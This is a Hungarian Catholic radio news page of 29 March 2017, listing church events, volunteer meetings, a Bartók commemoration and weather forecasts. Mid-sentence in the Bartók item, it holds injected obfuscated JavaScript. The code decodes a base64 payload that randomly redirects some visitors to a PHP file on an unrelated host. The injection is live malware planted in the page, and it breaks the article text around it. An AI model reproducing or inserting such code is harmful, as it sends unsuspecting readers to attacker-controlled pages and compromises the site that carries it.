2017. március 29. – Hírek és programajánló

H Í R E K   E S T E

Reménykedni minden reménység ellenére
Ferenc pápa a Szent Péter téren tartott ma délelőtti katekézisében Pál apostol római levelének híres passzusát magyarázta, melyben Ábrahámot mint atyánkat a hitben ismerjük fel (Róm 4, 16-22). Ma az apostol azt is megérteti velünk – mondta a pápa –, hogy Ábrahám atyánk a reménységben is. Mindez azért, mert a történetében a feltámadás, az új életnek a hírét érthetjük meg, mely legyőzi a rosszat és magát a halált is. Kérjük az Úr kegyelmét, hogy ne annyira a mi biztonságunk és képességünk alapján maradjunk, hanem azon a reménységen, mely az Úr ígéretéből fakad, mint Ábrahám igaz fiai – zárta katekézisét a Szentatya.

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a holnapi nap folyamán az atyhai plébániatemplomban tartják az örökös szentségimádási napot. Nagyböjt folyamán különösen jó alkalom ez az elcsendesedésre, az Oltáriszentségben jelen levő Krisztus imádatára és engesztelésére.

Mária rádiós önkéntestalálkozók
Kezdődnek a soron következő önkéntestalálkozók. Holnap délután négy órától Székelyudvarhelyen a Szent Pió lelkigyakorlatos házban találkozunk az önkéntesekkel. Március 31-én, pénteken délelőtt tíz órakor Gyergyószentmiklóson a Szent Miklós plébánián, majd délután négy órakor Sepsiszentgyörgyön a Krisztus Király altemplomában várjuk önkénteseinket. Kézdivásárhelyen ezúttal nem lesz önkéntes-találkozó.
Április 1-jén, a hónap első szombatján Csíksomlyón az önkéntes-találkozó délután négy órakor kezdődik a régi nyomda épületében. A következő helyszínekről hírműsorainkban tájékoztatjuk hallgatóinkat.
Buzdítunk mindenkit, jöjjenek el, hogy töltekezzünk a találkozások által. Várjuk azokat is, akik még nem önkéntesei a Mária Rádiónak, de szívükön viselik a közös előrehaladást!

Triduum Kolozsvár-Szentpéteren
Kolozsváron, a Szent Péter Plébániatemplomban a holnapi nappal kedődően nagyböjti triduumot tartanak. Az este hat órakor kezdődő szentmiséken az elmélkedéseket Simon Attila, a szatmárnémeti Kalazanci Szent József Római Katolikus Iskolaközpont spirituálisa tartja.

Márton Áronra emlékeznek Csíksomlyón
A Rákóczi esték keretében Márton Áronról, Erdély szentéletű püspökéről tart filmrészletekkel gazdagított előadást Nagy Zoltán, székelyudvarhelyi tanár, március 30-án, holnap délután hat órától Csíksomlyón, a Fodor Házban. Minden érdeklődőt várnak!

Triduum Parajdon
Március 31. – április 2. között, nagyböjti triduumot tartanak a parajdi plébániatemplomban. Meghívott szónok Balázs Imre nyugalmazott ditrói plébános. A program a következő képpen alakul: péntek este fél hét órától keresztút, majd hét órától szentmise. Szombaton szintén este hét órakor kezdődik a szentmise, vasárnap pedig délelőtt fél tizenegy órától. Mindenkit szeretettel várnak!

Szentmise a deportált németek emlékére
1945. elején több mint 70 ezer németet deportáltak Romániából a Szovjetunióba, mely eseményről a Német Demokrata Fórum ebben az évben is megemlékezik. 2017. április 2-án, vasárnap délelőtt fél tizenkét 11.30 kor a túlélőkért és az elhunytakért imádkozva mutat be német nyelvű szentmisét Böcskei László megyés püspök a nagyváradi Kapucinus Templomban.

Időjárás: Holnap, egyre gyakrabban zavarhatják meg felhők a  napsütést, melyekből elvétve csapadék is előfordulhat. Többfelé felélénkül az északias szél. Hajnalban az erdélyi medence térségében gyenge fagyra számíthatunk, délután 12-19 fok várható.

MRE – Hírszolgálat, 2017. március 29.


H Í R E K   R E G G E L / D É L B E N

Bartók Bélára emlékeztek Szatmárnémetiben
Szavalattal, népdallal, hegedűjátékkal és egy izgalmas előadással emlékezett a szatmári Bartók Béla Egyesület a névadó zenei zseni születésnapjára.
Bartók Béla 1881-ben Nagyszentmiklóson született március 25-én. 2017-ben március 25-én Szatmárnémetiben, a Szatmári Művészeti Iskola dísztermében emlékeztek a magyar zeneszerzőre, zongoraművészre, népzenekutatóra, a közép-európai népzene nagy gyűjtőjére, a róla elnevezett kulturális egyesület tagjai.
Az esemény keretében Csendes László többször is megszólaltatta hegedűjét, hol egyedül, hol Kovács Emőkével párban. Schuller Elza tanítványai – Farkas Arabella, Örmény Márk és Gáti Gábor – a Cantata profana mű alapját képező alapszöveget szavalták, úgy, ahogyan azt Bartók Béla is tette egykoron egy rádiós műsorban. Ifjú, tehetséges zenészek is felléptek, Mészáros Amfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');anda Bartók által gyűjtött népdalokat énekelt és természetesen fellépett a Bartók Béla Egyesület kórusa is.
Forrás: Szatmár.ro

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Székelykeresztúron tartják az örökös szentségimádási napot. Nagyböjt folyamán különösen jó alkalom ez az elcsendesedésre, az Oltáriszentségben jelen levő Krisztus imádatára és engesztelésére.

Mária rádiós önkéntestalálkozók
Hamaraosan elkezdődnek a soron következő önkéntestalálkozók.
Március 30.-án, holnap délután négy órától Székelyudvarhelyen a Szent Pió lelkigyakorlatos házban találkozunk az önkéntesekkel.
Március 31.-én, pénteken délelőtt tíz órakor Gyergyószentmiklóson a Szent Miklós plébánián, majd délután négy órakor Sepsiszentgyörgyön a Krisztus Király altemplomban. Kézdivásárhelyen ezúttal nem lesz önkéntes-találkozó.
Április 1.-én, a hónap első szombatján Csíksomlyón lesz önkéntes-találkozó délután négy órától a régi nyomda épületében.
Április 5-én, szerdán délután hat órától Nagyváradon, rádiónk stúdiójának kápolnájában szentmise lesz, majd ezt követően elkezdődik a találkozó.
Április 6-án, csütörtökön két önkéntestalálkozót tartunk: délelőtt tizenegy órától Marosvásárheleyn a Deus Providebit Házban, délután fél öt órától pedig Kolozsváron, a Szent Mihály Nőszövetség szentegyház utcai dísztermében.
Végül április 7-én, pénteken délután négy órára Nagykárolyba, a Szent László közösségi házba várjuk önkéntes munkatársainkat.
Buzdítunk mindenkit, jöjjenek el, hogy töltekezzünk a találkozások által. Várjuk azokat is, akik még nem önkéntesei a Mária Rádiónak, de szívükön viselik a közös előrehaladást!

Triduum Parajdon
Március 31. - április 2. között, nagyböjti triduumot tartanak a parajdi plébániatemplomban. A triduumot Fehér Márton parajdi plébános meghívására Balázs Imre nyugalmazott ditrói plébános vezeti. A program a következő képpen alakul: péntek este fél hét órától keresztút, majd hét órától szentmise. Szombaton szintén este hét órakor kezdődik a szentmise, vasárnap pedig délelőtt fél tizenegy órától. Mindenkit szeretettel várnak!
 
Medjugorje -i imaest Csíkszeredában
Medjugorje -i imaestet tartanak Csíkszeredában holnap délután öt órától a Segítő Mária gimnázium bentlakásának dísztermében. Hívnak és várnak mindenkit a közös imára és ünnepre.

Nemzetközi tudományos konferencia Gyulafehérváron
2017. április 5-7. között Gyulafehérváron Nemzetközi tudományos konferencia lesz Septuaginta, inkulturáció és az identitás őrzése címmel – tudtuk meg a RomKat.ro honlapjáról.

Elváltak és újraházasodottak hétvégéje
„Íme, újjáteremtek mindent!” mottóval április 7-8. között szervezik meg a Gyulafehérvári Családpasztorációs Központ munkatársai az elváltak és újraházasodottak hétvégéjét. Helyszín a székelyudvarhelyi Szent Pio Lelkigyakorlatos Ház. A program péntek este hat órakor kezdődik és szombaton vacsorával ér véget. A hétvége részvételi díja: 25lej/fő/hétvége. Bejelentkezni április 5-ig lehet a kertesz.maria@csalad.ro e-mail címen, további részletes információk pedig a 0743-152008-as telefonszámon igényelhetők.

Húsvéti lelkigyakorlat Csaba testvérrel
Április 11-16. között húsvéti lelkigyakorlat lesz Böjte Csaba atya vezetésével a dévai ferences templomban. Részletes program a Szent Ferenc Alapítvány honlapján található.

Időjárás: Ma zavartalan lesz a napsütés, csak elvétve jelenhetnek meg felhők az égen, de csapadék sehol sem várható. Napközben helyenként  megélénkül a szél, néhol erős széllökések is előfordulhatnak. A hideg reggelt, meleg délután követi, sokfelé 20 C fok fölé emelkedik a hőmérséklet. 

MRE - Hírszolgálat, 2017. március 29.

About the author

maradmin

Leave a Comment